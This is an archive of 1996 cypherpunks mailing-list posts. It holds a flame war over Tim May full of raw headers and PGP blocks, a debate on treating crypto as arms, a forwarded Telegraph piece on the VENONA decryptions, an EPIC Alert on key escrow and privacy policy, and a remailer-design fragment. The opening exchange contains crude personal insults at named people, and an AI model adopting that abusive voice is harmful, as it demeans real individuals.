>> >> >Content-Transfer-Encoding: 7bit
>> >> >Content-Length: 4378
>> >> >
>> >> >>                    berserk
>> >> >> Timmy May has gone        . Has he been eating speed?
>> >> >>                    bananas
>> >> >>
>> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >Message-Id: <199609300138.AA08482@crl12.crl.com>
>> >> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
>> >> >> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >Mime-Version: 1.0
>> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >Content-Length: 3442
>> >> >> >
>> >> >> >>
>> >> >> >> What has Timmy been smoking?
>> >> >> >>
>> >> >> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> >> >> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> >> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> >> >> ]	for dlv
>> >> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> >> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> >> >> >> ]          29 Sep 96 15:59 BST
>> >> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> >> >> ]           id aa09441; 29 Sep 96 15:54 BST
>> >> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> >> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> >> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> >> >> >> ]From: paul@fatmans.demon.co.uk
>> >> >> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> >> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> >> >> >> ]Mime-Version: 1.0
>> >> >> >> ]Content-Type: text/plain; charset=US-ASCII
>> >> >> >> ]Content-Transfer-Encoding: 7BIT
>> >> >> >> ]Subject: Re: Possible subs attack????
>> >> >> >> ]Priority: normal
>> >> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4
>> >> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> >> >> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
>> >> >> >> ]
>> >> >> >> ]-----BEGIN PGP SIGNED MESSAGE-----
>> >> >> >> ]
>> >> >> >> ]
>> >> >> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
>> >> >> >> ]
>> >> >> >> ]> The lying sack of shit Timmy May lies again, as usual.
>> >> >> >> ]
>> >> >> >> ]Fuck you,
>> >> >> >> ]
>> >> >> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> >> >> ]don`t sign keys here and there without checking ID`s...
>> >> >> >> ]
>> >> >> >> ]Type Bits/KeyID    Date       User ID
>> >> >> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
>> >> >> >> ]
>> >> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
>> >> >> >> ]Version: 2.6.3ia
>> >> >> >> ]
>> >> >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
>> >> >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
>> >> >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
>> >> >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
>> >> >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
>> >> >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
>> >> >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
>> >> >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
>> >> >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
>> >> >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
>> >> >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
>> >> >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
>> >> >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
>> >> >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
>> >> >> >> ]=CMZA
>> >> >> >> ]- -----END PGP PUBLIC KEY BLOCK-----
>> >> >> >> ]
>> >> >> >> ]
>> >> >> >> ]
>> >> >> >> ]-----BEGIN PGP SIGNATURE-----
>> >> >> >> ]Version: 2.6.3ia
>> >> >> >> ]Charset: cp850
>> >> >> >> ]
>> >> >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
>> >> >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
>> >> >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
>> >> >> >> ]2Wqa5+h8R7g=
>> >> >> >> ]=/M2U
>> >> >> >> ]-----END PGP SIGNATURE-----
>> >> >> >> ]
>> >> >> >> ]  Datacomms Technologies web authoring and data security
>> >> >> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
>> >> >> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>> >> >> >> ]       Http://www.cryptography.home.ml.org/
>> >> >> >> ]      Email for PGP public key, ID: 5BBFAEB1
>> >> >> >> ]     "Don`t forget to mount a scratch monkey"
>> >> >> >>
>> >> >> >Fuckhead.
>> >> >>
>> >> >Fuckhead.  We know your behind Vulis, Cock-sucker
>> >>
>> >and he swallows
>>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 3 Oct 1996 14:11:11 +0800
To: cypherpunks@toad.com
Subject: [SPAM] More "fuckhead" e-mail from Timmy May and his young friends
In-Reply-To: <Pine.3.89.9610021109.A23982-0100000@netcom>
Message-ID: <wV67uD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May posts inane rants with no crypto-relevance to this mailing list and
attributes nonsense to people who never said it. Therefore he fully deserves
every virtual fart being emitted in his general direction.

>Date: Wed, 2 Oct 1996 12:16:17 -0700 (PDT)
>From: "Z.B." <zachb@netcom.com>
>Sender: "Z.B." <zachb@netcom.com>
>Reply-To: "Z.B." <zachb@netcom.com>
>Subject: Fuckhead ranting
>To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>In-Reply-To: <B1k6uD3w165w@bwalk.dm.com>
>Message-Id: <Pine.3.89.9610021109.A23982-0100000@netcom>
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
>
>On Wed, 2 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> Timmy May lies, rants, posts off-topic, and pollutes the cypherpunks
>> list...
>etc, etc, ad nauseum, ad infinitum.
>
>
>Boy, you just don't know when to shut the fuck up!  You are *THE* single
>problem with this list today.  Probably the reason why "most of the good
>people left the list" (so you claim)  is because of *YOUR* stupid ranting
>about Tim May, which is largely undeserved.  Do the list a favor and get
>the hell off it.
>
>All further messages from you will be killfiled.
>
>
>Zach Babayco
>
>zachb@netcom.com <-------finger for PGP public key
>http://www.geocities.com/SiliconValley/Park/4127
>-----
>If you need to know how to set up a mail filter or defend against
>emailbombs, send me a message with the phrase "get helpfile" in the
>SUBJECT header.  I have several useful FAQ's and documents available.
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 3 Oct 1996 18:41:33 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Right to Keep and Bear Crypto
Message-ID: <v02130500ae787e7a5c41@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>> Steve Schear wrote:
>>I'm not a consitiutional scholar, but it seems to me that since the
>>government has already classed crypto as arms via ITAR and since the I am
>>guaranteed the right to bear arms I choose to bear the crypto of my choice
>>as part of my arsonal.

>Tom May wrote:
>I've argued since 1992 on Usenet and here that "crypto as arms" is a
>potentially dangerous tack to follow. (Others, including legal experts,
>have also argued this point.)
>
>Given that it is well-established, whether we agree or not, that the USG
>may restrict private ownership of atom bombs, nerve gases, CBW weapons,
>machine guns, switchblade knives, nunchuk sticks, and various other "arms,"
>the association of crypto with armaments is potentially *DISASTROUS*.

Unless we get the strong support of the gun lobby and NRA.

>
>A far better strategy is to associate crypto with *speech*, which most
>people seem to think has stronger protection. And, truth be told, I view
>encrypted communications as a helluva lot more like a form of communication
>than I view it as a cousin to my Heckler & Koch .45 USP.
>
>In my view, equating crypto with armaments is exactly what the USG would
>like to see happen. This legitimizes their control of crypto.
>

I agree.  However, if the forces of evil attempt to get GAK mandidated or
begin arresting or harrassing those who would provide strong crypto it
might an option.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 3 Oct 1996 22:48:54 +0800
To: cypherpunks@toad.com
Subject: Re: VENONA Project; KGB files reveal clue that broke British spy
In-Reply-To: <2.2.32.19961002203102.006d4274@direct.ca>
Message-ID: <9N77uD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From belarus@solar.rtd.utk.edu  Wed Oct  2 19:30:59 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 02 Oct 96 20:43:54 EDT
	for dlv
Received: from SOLAR.RTD.UTK.EDU by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA20681 for dlv@bwalk.dm.com; Wed, 2 Oct 96 19:30:59 -0400
Received: from  (LOCALHOST.rtd.utk.edu)
           by solar.rtd.utk.edu; Wed, 2 Oct 96 19:25:40 EDT
Date: Wed, 2 Oct 96 19:25:40 EDT
Message-Id: <2.2.32.19961002203102.006d4274@direct.ca>
Errors-To: kasaty@seanet.com
Reply-To: belarus@solar.rtd.utk.edu
Originator: belarus@solar.rtd.utk.edu
Sender: belarus@solar.rtd.utk.edu
Precedence: bulk
From: Stefan Lemieszewski <stefanl@direct.ca>
To: Multiple recipients of list <belarus@solar.rtd.utk.edu>
Subject: VENONA Project; KGB files reveal clue that broke British spy
X-Listprocessor-Version: 6.0b -- ListProcessor by Anastasios Kotsikonas
X-Comment:  BELARUS issues and communication

Fyi for any researchers in this field, accompanied by a related article in
The Daily Telegraph.

Stefan Lemieszewski

----------------------------------------------------------------------------
------------------------------------------------

The VENONA Project

"In July 1995 the Intelligence Community ended a 50-year silence regarding
one of cryptology's most splendid successes - the VENONA Project. VENONA was
the codename used for the U.S. Signals Intelligence effort to collect and
decrypt the text of Soviet KGB and GRU messages from the 1940's. These
messages provided extraordinary insight into Soviet attempts to infiltrate
the highest levels of the United States Goverment.=20

Today, we are proud to offer these exceptional documents on the NSA home
page and we invite you to study and interpret them in the context of
history. NSA will declassify over 2200 messages related to VENONA. We
believe they will not only provide a window into Soviet espionage during the
1940's, but will also give you a glimpse of the important contributions
signals intelligence and cryptographic expertise make to our nation's
security. "

The above quote is from from the introduction to the VENONA Project by Mr.
William P. Crowell, Deputy Director, National Security Agency

You can find Venona at:=20

        http://www.nsa.gov:8080/docs/venona/ddir.html

----------------------------------------------------------------------------
---------------------------------------------------------------

The article below is from The Daily Telegraph, October 2, 1996:

----------------------------------------------------------------------------
---------------------------------------------------------------

                  KGB files reveal clue that broke British spy ring
                  By Michael Smith=20

                          The name's Bond, Vladimir Bond

                  THE intercepted KGB messages that detail Moscow's dealings
with the British spies Kim Philby, Donald Maclean and Guy Burgess were
released by  GCHQ yesterday.

                  The move was forced on the Cheltenham spy base by the
Americans, who released on to the Internet the results of Operation Venona,
the top-secret project to decipher Moscow Centre's communications with its
foreign stations.

                  The files placed in the Public Record Office at Kew
yesterday include the vital clue that led to the collapse of the Cambridge
spy ring. They also name another Cambridge-based spy, Dr Theodore Hall, an
American who worked inside the Manhattan Project, the secret programme to
develop the atom bomb. He was never prosecuted and still lives in England.

                  But it is Maclean, recruited by Philby while he was still
a Cambridge student, who emerges as the jewel in the KGB's crown. In April
1944, as a rising star in the Foreign Office, he was posted to the
Washington embassy.

                  The deciphered messages show he gave the Russians a wealth
of information on Anglo-American relations and their secret post-war
agreements, including the exchanges of atomic secrets.

                  Since his wife Melinda was pregnant and living with her
mother in New York,  Maclean had the perfect excuse to go there every
weekend to pass the information on to his KGB control, away from the routine
surveillance of diplomats in Washington.

                       MI5 narrowed down those names to a handful of people
                       who would have had access to the top-secret exchanges
                       between London and Washington

                  It was not until 1949 that the Venona team managed to
break into the messages from New York to Moscow containing the information
provided by Maclean, who was identified by the cover name Homer. Philby, who
was  posted to Washington as an intelligence liaison officer shortly after
the messages were deciphered, described how the FBI concluded that any one
of 6,000 people might have been Homer.

                  "It had so far occurred neither to them nor the British
that a diplomat was involved, let alone a fairly senior diplomat," he said.
"Instead, the investigation had concentrated on non-diplomatic employees of
the embassy."

                  But slowly, MI5 narrowed down those names to a handful of
people who  would have had access to the top-secret exchanges between London
and  Washington.

                  Then in April 1951, the Venona cryptanalysts found the
vital clue in one of the messages. For part of 1944, Homer had had regular
contacts with his Soviet control in New York - using his pregnant wife as an
excuse. The  names had been narrowed down to just one - Donald Maclean.
Tipped off by  Philby, who had access to the Venona material, he fled to
Moscow with  Burgess.

                  Dr Hall is the Cambridge scientist named in the files as
the KGB's main spy in the Los Alamos complex in New Mexico, where the US
atomic bomb was developed. He refused to comment last night. He came to
Britain in the 1950s after US intelligence discovered that he was Mlad, the
man who along with his British colleague Klaus Fuchs gave the Russians the
technical  details of the so-called Manhattan Project.

                       Fuchs, a German emigr=E9 who became a naturalised
                       British citizen, became a KGB spy in 1941

                  Because he never confessed, the authorities could not
prosecute him without giving away the extent to which the KGB messages were
being read.  Dr Hall, who is now 70 and suffering from terminal cancer and
Parkinson's  disease, still lives with his wife Joan in a semi-detached
house in Cambridge.

                  Within the university, where he worked until the
mid-1980s, he is renowned for his pioneering work on biological X-ray
microanalysis, which allows  scientists to work out the presence of various
elements within living matter.  Hall was a brilliant man who was already a
Harvard graduate when, at the age of 19, he was recruited first by the
Manhattan Project and then, almost  immediately, by the KGB.

                  As well as providing technical explanations of the atomic
processes, Dr Hall  gave Moscow a complete list of universities doing work
on the Manhattan  Project so the KGB could seek out other agents within
them.  The files show that he and Fuchs were far more important than the
more  famous Julius Rosenberg, cover named Liberal, and his wife Ethel, who
were  both sent to the electric chair. Fuchs, a German emigr=E9 who became a
naturalised British citizen, became a KGB spy in 1941.   He confessed and in
1950 was sentenced at the Old Bailey to 14 years' jail.
In the mid-1950s he was allowed to go to East Germany, where he died in=
 1988.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Thu, 3 Oct 1996 17:32:36 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC Alert 3.17
Message-ID: <n1367833073.30718@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


    =============================================================

       @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
       @     @  @   @   @        @ @   @     @     @  @    @
       @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
       @     @      @   @       @   @  @     @     @  @    @
       @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

   ==============================================================
   Volume 3.17                                    October 2, 1996
   --------------------------------------------------------------

                            Published by the
              Electronic Privacy Information Center (EPIC)
                            Washington, D.C.

                          http://www.epic.org/

=======================================================================
Table of Contents
=======================================================================

[1] White House Releases New Clipper Proposal
[2] International Crypto Symposium Held in Paris for OECD
[3] OECD Crypto Experts Meet in Paris
[4] Human Rights Groups Release Crypto Resolution 
[5] E-FOIA Bill Approved by House and Senate
[6] P-TRAK SSN System Criticism Continues
[7] Avrahami Files Appeal to State Supreme Court
[8] Upcoming Conferences and Events

=======================================================================
[1] White House Releases New Clipper Proposal
=======================================================================

The White House has released the latest version of the key
escrow/recovery plan intended to promote government access to encoded
communications. The new proposal follows similar proposals in which
the Administration offers to relax export regulations in exchange for
an industry commitment to establish key escrow encryption.

Under the plan announced by the Office of the Vice President on
October 1, 1996, companies would be allowed to export 56-bit
encryption systems for the next two years if they setup a formal
process to fully develop a key escrow system. After two years,
non-escrow systems would be prohibited. Jurisdiction for the control
of exports would also be transferred from the State Department to the
Commerce Department. The Justice Department would be given veto power
over export applications. The White House plans to introduce
legislation for key escrow centers.

According to the statement released by the Vice President, the
Administration will continue to promote key escrow encryption through
the purchase of key recovery products, bilateral and multilateral
discussions, federal cryptographic and key recovery standards, and
federal funding.

The statement also said that "the Administration's initiative is
broadly consistent with the recent recommendations of the National
Research Council." However, the NRC report recommended against
government promotion of key escrow encryption, noting that "the risks
of key escrow encryption are considerable," Earlier this year, the
Internet Society also endorsed a recommendation of the Internet
Architecture Board and the Internet Engineering Steering Group which
said that "such policies are against the interests of consumers and
the business community, and are largely irrelevant to issues of
military security."

IBM announced that it would establish an industry consortium to
support the plan, and several US hardware companies signed on.
However, Netscape head Jim Barkesdale described the proposal as
"extortion". Bipartisan criticism was also heard from Congress. Both
Senator Leahy and Senator Burns quickly issued releases criticizing
the proposal.

The software industry expressed opposition to the White House plan.
The Software Publishers Association, the Business Software Alliance,
and the International Technology Association of America criticized the
proposal.

More information on Clipper 4.0 is available at:
  
  http://www.epic.org/crypto/key_escrow/

=======================================================================
[2] International Crypto Symposium Held in Paris for OECD
=======================================================================

On September 25, 1996 cryptographers, human rights advocates, legal
scholars, and delegates to the Organization for Economic Cooperation
and Development met in Paris to explore issues concerning cryptography
policy. The symposium was scheduled to coincide with an OECD meeting
to consider new guidelines on international cryptography policy. The
conference on the "Public Voice in the Development of International
Encryption Policy" was sponsored by EPIC and Planete Internet and held
in the Centre de Conferences des Internationales.

Justice Michael Kirby, a member of the High Court of Australia and
former chair of the OECD expert panels on security and privacy, opened
the conference with remarks that placed the current effort to develop
cryptography guidelines in the larger context of the OECD's work on
privacy and information security and the ongoing need to recognize
human rights concerns.

Justice Kirby, drawing on his international human rights work in the
area of HIV/AIDS, urged participants to keep in mind ten principles
for the development of sound policies. Justice Kirby concluded his
remarks with an appeal that "the claims of national security and law
enforcement agencies be attained within a context of
constitutionalism, the rule of law and respect for, and effective
protection of human rights." Kirby reminded those present that
"respect of human rights, and especially individual privacy" is "the
ultimate common denominator of the OECD."

Welcoming remarks were provided Mr. Norman Reaburn the Chair of the
OECD Expert Panel on Cryptography Policy, Mr. John Dryden the head of
the OECD Secretariat, and Mr. Marc Rotenberg the director of the
Electronic Privacy Information Center (EPIC) in Washington, DC. The
panels were moderated by OECD delegates from Australia, Canada,
Germany, and Japan.

The first panel "Cryptography Policy: The View of Cryptographers"
featured Dr. Ross Anderson of the University of Cambridge, Dr. Matt
Blaze of AT&T Laboratories, Dr. Whitfield Diffie of Sun Microsystems,
Mr. Yves Le Roux of Digital Research, and Dr. Herb Lin of the National
Research Council.

The second panel "Human Rights Issues in the Development of
Cryptography Policy" featured Mr. Dave Banisar of EPIC, Mme. Louise
Cadoux of the Commission Nationale de l'Informatique et des Libertes,
Mr. Simon Davies of Privacy International, Mr. Barry Steinhardt with
the American Civil Liberties Union, and Mr. Alain Weber of the French
Human Rights League

The third panel "User Needs for Strong Cryptography" featured Dr.
Brian Carpenter of the Internet Architecture Board, Dr. Stephane
Bortzmeyer of the Association des Utilisateurs d'Internet, and Mr.
Phil Zimmerman of the Pretty Good Privacy Inc.

The final panel "Legal Dimensions and Cryptography Policy" featured
Mr. Victor Mayer-Schoenberger of the Austrian Institute for Law and
Policy, Mr. Kevin O'Connor the Australian Privacy Commissioner, and
Prof. Joel Reidenberg of the Fordham Law School and the Sorbonne.

The complete program for the EPIC/Planete Internet conference, the
speech of Justice Kirby, remarks of speakers, and other resources are
available at:

  http://www.epic.org/events/crypto_paris/

=======================================================================
[3] OECD Crypto Panels Meets in Paris
=======================================================================

Following the EPIC/Planete Internet conference, the OECD Member
countries met in Paris for two days to discuss Cryptography Policy
Guidelines that could provide internationally comparable criteria for
encryption of computerised information.

According to the OECD, the Guidelines identify the issues which
countries should take into consideration in formulating cryptography
policies at the national and international level. An OECD press
statement said that, "Discussions have focused on the rights of users
to choose cryptographic methods, the freedom of the market to develop
them, interoperability, consequences for the protection of personal
data and privacy, lawful access to encrypted data, and reducing the
barriers to international trade."

The OECD Guidelines will be non-binding recommendations to Member
governments, meaning that they will not be part of international law,
nor will they endorse any specific cryptography system.

The Group of Experts on Cryptography Policy will continue discussions
the week of December 16, with a view to completion this year of a
draft of the Guidelines which would be forwarded for approval by the
Council of the OECD early in 1997.

The complete text of the OECD press statement is available in english
at:

 http://www.epic.org/events/crypto_paris/releaseE_OECD.html

The complete text of the OECD press statement is available in french
at:

 http://www.epic.org/events/crypto_paris/releaseF_OECD.html

=======================================================================
[4] Human Rights Groups Release Privacy Resolution 
=======================================================================

More than a dozen international human rights and cyber rights
organizations recently endorsed a resolution in Support of the Freedom
to Use Encryption. The resolution was released in Paris on September
25, just prior to the meeting of the OECD.

Noting that "national governments have already taken steps to detain
and to harass users and developers of cryptography technology" and
that "cryptography is already in use by human rights advocates who
face persecution by their national governments," the organizations
urged the OECD to "base its cryptography policies on the fundamental
right of citizens to engage in private communication."

The organizations further urged the OECD to "resist policies that
would encourage the development of communication networks designed for
surveillance."

The organizations that endorsed the resolution included ALCEI
(Electronic Frontiers Italy), the American Civil Liberties Union,
Association des Utilisateurs d'Internet, CITADEL-EF France, Computer
Professionals for Social Responsibility, cyberPOLIS, Digital Citizens
Foundation in the Netherlands, EFF-Austin, Electronic Frontier
Australia, Electronic Frontier Canada, Electronic Frontier Foundation,
Electronic Privacy Information Center, Human Rights Watch, NetAction,
and Privacy International

The campaign was organized by the Global Internet Liberty Coalition, a
new coalition of national and international human rights and cyber
rights organizations.

The complete text of the crypto resolution is available at:

  http://www.gilc.org/gilc/resolution.html


=======================================================================
[5] E-FOIA Bill Approved by House and Senate
=======================================================================

Congress has passed and sent to the President the Electronic Freedom
of Information Act Amendments of 1996. The "E-FOIA" legislation
requires federal agencies to make information available to requesters
in electronic form "if the record is readily reproducible by the
agency in that form or format." It also requires agencies to maintain
indices of previously released documents that are "likely to become
the subject of subsequent requests," and to make such indices
available "by computer telecommunications" no later than December 31,
1999.

The legislation also attempts to tackle the perennial problem of
agency delays in responding to FOIA requests. These provisions include
the establishment of "multitrack processing of requests ... based on
the amount of work or time (or both) involved," and the expedited
processing of requests upon a showing of "compelling need." It is
likely that these new provisions, like earlier FOIA amendments
designed to improve public access, will be applied narrowly by federal
agencies and become the subject of litigation.

The text of the E-FOIA legislation is available at:

   http://www.epic.org/open_gov/foia/efoia.html

=======================================================================
[6] P-TRAK SSN System Criticism Continues
=======================================================================

Opposition to the proliferation of commercial databases exploded into
public view recently when the Lexis-Nexis P-TRAK "personal locator"
system prompted a flood of angry e-mail and telephone calls to the
information service company. The P-TRAK database originally allowed
Lexis-Nexis subscribers to search under an individual's name and
access telephone numbers, addresses, previous addresses, maiden names
and Social Security numbers (SSNs). After an initial flurry of
complaints in June, the company claimed that it had eliminated SSNs
from its database. After the recent flare-up, the firm provided a
clarification: SSNs are no longer searchable using an individual's
name, but a subscriber can start with an SSN (or any nine-digit
number, for that matter), and obtain all of the personally-identifying
information that goes along with that number.

Also, contrary to claims of the Lexis/Nexis company, the personal data
was not publicly available, nor is it similar to "white pages"
information. In fact, Lexis/Nexis obtained the P-TRAK personal locator
information from TransUnion, a credit reporting agency. The two
companies exploited a loophole in the Fair Credit Reporting Act which
leaves credit "header" information unprotected even though the
associated credit report could not be disclosed.

In the wake of the P-TRAK episode, the Federal Trade Commission
recommended that Congress take steps to provide greater protection for
sensitive information. The FTC says that it has received "numerous
complaints "... concerning recently-introduced, widely-available
commercial services that provide, for a fee, identifying information
on individuals." Congress adjourned before it could act, but is likely
to take up the issue next year.

Additional information on the misuse of Social Security numbers is
available at:

   http://www.epic.org/privacy/ssn/


=======================================================================
[7] Avrahami Files Appeal to State Supreme Court
=======================================================================

Ram Avrahami, the Virginia resident who brought suit last year against
U.S. News and World Report for selling his name without his consent,
has appealed the decision of a lower court to the Virginia State
Supreme Court.

Mr. Avrahami argues that the lower court wrongly dismissed his claim.
He argues that under Virginia law "the unauthorized sale, exchange, or
rental of a person's name as part of a mailing list violates the
Privacy Act's prohibition on using a person's name for the purposes of
trade." He also contends, among other points, that "the Mail
Preference Service established by the Direct Marketing Association is
no substitute for the 'written consent' required by the Privacy Act."

U.S. News & World Report will reply to Mr. Avrahami's motion and then
the Virginia Supreme Court must decide whether to review the decision
of the lower court.

More information on Avrahami v. US News & World Report is available
at:

 http://www.epic.org/privacy/junk_mail/

=======================================================================
[8] Upcoming Conferences and Events
=======================================================================

"Managing Privacy in Cyberspace and Across National Borders." October
8-10, 1996. Washington, DC. Sponsored by Privacy and American
Business. Contact: Lorrie Sherwood, (201) 996-1154.

"The Information Society: New Risks & Opportunities in Privacy,"
October 17-18, 1996. Bruxelles, Belgium. Sponsored by the European
Parliament. Contact: http://www.droit.fundp.ac.be/privacy96.html

"Communications Unleashed - What's at Stake? Who Benefits? How to Get
Involved!" October 19-20, 1996. Washington DC. Sponsored by CPSR and
Georgetown University. Contact: phyland@aol.com.

"19th National Information Systems Security Conference." October
22-25, 1996. Baltimore, MD. Sponsored by NSA & NIST. Contact: Tammy
Grice (301) 948-2067.

National Consumer Rights Litigation Conference: Defending Consumer
Access to Justice. October 26-28. Washington, DC. Sponsored by the
National Consumer Law Center. Contact: NCSL: (617) 523-7398 (fax).

ETHICOMP96: The Third International Conference on Ethical Issues of
Information Technology, November 6-8, 1996. Madrid, Spain. Contact:
pbarroso@capilla.cph.es.

"CFP97: Commerce & Community." March 11-14, 1997. Burlingame,
California. Sponsored by the Association for Computing Machinery.
Contact: Cfp97@cfp.org or http://www.cfp.org.

"Eurosec'97, the Seventh Annual Forum on Information Systems Quality
and Security." March 17-19. 1997. Paris, France. Sponsored by XP
Conseil. Contact: http://ourworld.compuserve.com/homepages/eurosec/

"INET 97 -- The Internet: The Global Frontiers." June 24-27, 1997.
Kuala Lumpur, Malaysia. Sponsored by the Internet Society. Contact:
inet97@isoc.org or http://www.isoc.org/inet97.


       (Send calendar submissions to alert@epic.org)

=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center. To subscribe, send email to
epic-news@epic.org with the subject: "subscribe" (no quotes).

Back issues are available via http://www.epic.org/alert/

=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC. It was established in 1994 to focus
public attention on emerging privacy issues such as the Clipper Chip,
the Digital Telephony proposal, national id cards, medical record
privacy, and the collection and sale of personal information. EPIC is
sponsored by the Fund for Constitutional Government, a non-profit
organization established in 1974 to protect civil liberties and
constitutional rights. EPIC publishes the EPIC Alert, pursues Freedom
of Information Act litigation, and conducts policy research. For more
information, email info@epic.org, HTTP://www.epic.org or write EPIC,
666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544
9240 (tel), +1 202 547 5482 (fax).

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible. Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003. Individuals with First Virtual
accounts can donate at http://www.epic.org/epic/support.html

Your contributions will help support Freedom of Information Act and
First Amendment litigation, strong and effective advocacy for the
right of privacy and efforts to oppose government regulation of
encryption and funding of the National Wiretap Plan.

Thank you for your support.

  ---------------------- END EPIC Alert 3.17 -----------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 3 Oct 1996 19:18:21 +0800
To: cypherpunks@toad.com
Subject: Re: Making Remailers Widespread [REMAILERS]
In-Reply-To: <199609300728.AAA17384@netcomsv.netcom.com>
Message-ID: <ua97uD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> >One other suggestion: instead of storing one bit of information (the
> >address is on the list or not), why not have several flag bits.
> >E.g., the blocking list could contain records similar to:
> >hash - e.g. 160-bit SHA
> >flags - e.g. reserve 32 bits
...
